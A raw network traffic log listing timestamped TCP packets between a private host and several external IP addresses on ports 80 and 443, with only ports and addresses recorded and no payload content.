Dec 12, 2024 16:48:12.399341106 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.399382114 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.399446964 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.400475025 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.400619030 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.400778055 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.400778055 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.401655912 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.401731968 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.402436018 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.402436018 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.402854919 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.402928114 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.403333902 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.403333902 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.404100895 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.404156923 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.404242992 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.404284954 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.405256033 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.405356884 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.405432940 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.405505896 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.406320095 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.406528950 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.406919956 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.406920910 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.407699108 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.407759905 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.407861948 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.407917976 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.408685923 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.408768892 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.408772945 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.408835888 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.409826040 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.409948111 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.410177946 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.410177946 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.411061049 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.411124945 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.411200047 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.411253929 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.412283897 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.412353039 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.412425995 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.412554979 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.413470984 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.413728952 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.413813114 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.413867950 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.414596081 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.414699078 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.414714098 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.414805889 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.415816069 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.415895939 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.415920973 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.416965008 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.416971922 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.417032003 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.417100906 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.418159008 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.418283939 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.419338942 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.419338942 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.419338942 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.419363022 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.419415951 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.419647932 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.420562029 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.420648098 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.420667887 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.420667887 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.420703888 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.421824932 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.422069073 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.422086954 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.422131062 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.423403025 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.423492908 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.423592091 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.424026012 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.424072027 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.424072027 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.424130917 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.424945116 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.425719976 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.425782919 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.425923109 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.425923109 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.427226067 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.427342892 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.427356958 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.427432060 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.427573919 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.427592039 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.427614927 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.427653074 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.428776026 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.428792953 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.428889990 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.429997921 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.430057049 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.430067062 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.430110931 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.431109905 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.431169033 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.431253910 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.431297064 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.432348013 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.432414055 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.432432890 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.432472944 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.433518887 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.433624983 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.434182882 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.434182882 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.434766054 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.434855938 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.434880972 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.434916973 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.436317921 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.436419964 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.436458111 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.437005997 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.437282085 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.438294888 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.438409090 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.438409090 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.438409090 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.438409090 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.438455105 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.438549995 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.439332008 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.439462900 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.439470053 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.440573931 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.440622091 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.440623045 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.440679073 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.441358089 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.441689968 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.441759109 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.441772938 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.441922903 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.442876101 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.443101883 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.443137884 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.443332911 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.444032907 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.444169998 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.444169998 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.444519997 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.445213079 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.445271969 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.445314884 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.445355892 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.446520090 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.446640968 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.446701050 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.446701050 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.447725058 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.447773933 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.447793007 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.447839022 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.448781013 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.448870897 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.448889971 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.448973894 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.450001001 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.450140953 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.450192928 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.450232029 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.451062918 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.451127052 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.581393957 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.581448078 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.581471920 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.581516027 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.581964016 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.582006931 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.582027912 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.582266092 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.582923889 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.583029985 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.583044052 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.583331108 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.584026098 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.584145069 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.584184885 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.584184885 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.585398912 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.585454941 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.585524082 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.585597992 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.586431026 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.586471081 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.586529016 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.586565971 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.587608099 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.587694883 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.587752104 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.587852001 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.588787079 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.588855982 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.588886023 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.588939905 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.589984894 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.590051889 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.590075016 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.590358019 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.591118097 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.591171980 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.591228962 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.591326952 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.592291117 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.592410088 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.592427969 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.592587948 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.593664885 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.593799114 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.593838930 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.593838930 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.594762087 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.594855070 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.594918966 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.594918966 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.595911026 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.595957041 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:12.596175909 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:12.596175909 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:14.775909901 CET	49856	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:14.776274920 CET	49868	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:14.896076918 CET	80	49868	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:14.896120071 CET	80	49856	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:14.896282911 CET	49856	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:14.896310091 CET	49868	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:14.896534920 CET	49868	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:15.016345978 CET	80	49868	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:15.392710924 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:15.392735004 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:15.392992020 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:15.405958891 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:15.405985117 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:16.236272097 CET	80	49868	185.215.113.43	192.168.2.10
Dec 12, 2024 16:48:16.237759113 CET	49868	80	192.168.2.10	185.215.113.43
Dec 12, 2024 16:48:16.264858961 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:16.264992952 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:16.384934902 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:16.385540009 CET	80	49858	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:16.386100054 CET	49858	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:16.387531042 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:16.415262938 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:16.535604000 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:16.953129053 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:16.953181982 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:16.954195023 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:16.966945887 CET	49875	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:16.966964960 CET	443	49875	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:17.112519979 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:17.112615108 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:17.113310099 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:17.113368988 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:17.174036026 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:17.174062014 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:17.174360037 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:17.174413919 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:17.175831079 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:17.219343901 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:17.714489937 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714499950 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714508057 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714551926 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.714585066 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.714623928 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714706898 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714719057 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714720011 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.714731932 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714735031 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.714765072 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.714812994 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714824915 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714835882 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.714850903 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.714874983 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.834417105 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.834484100 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.834527969 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.834569931 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.838675022 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.838749886 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.908431053 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.908524036 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.908545971 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.908598900 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.911542892 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.911606073 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.911657095 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.911698103 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.920001030 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.920053005 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.920104980 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.920141935 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.928369999 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.928426027 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.928428888 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.928464890 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.936839104 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.936937094 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.936992884 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.937041998 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.945277929 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.945346117 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.945373058 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.945420980 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.953670979 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.953725100 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.953835011 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.953874111 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.962114096 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.962167978 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.962234974 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.962279081 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.970525980 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.970630884 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.970700979 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.978869915 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.979010105 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.979065895 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:17.988167048 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.988291025 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:17.988348961 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.021194935 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:18.023601055 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:18.023641109 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:18.023683071 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:18.023802042 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:18.023852110 CET	443	49870	216.58.208.238	192.168.2.10
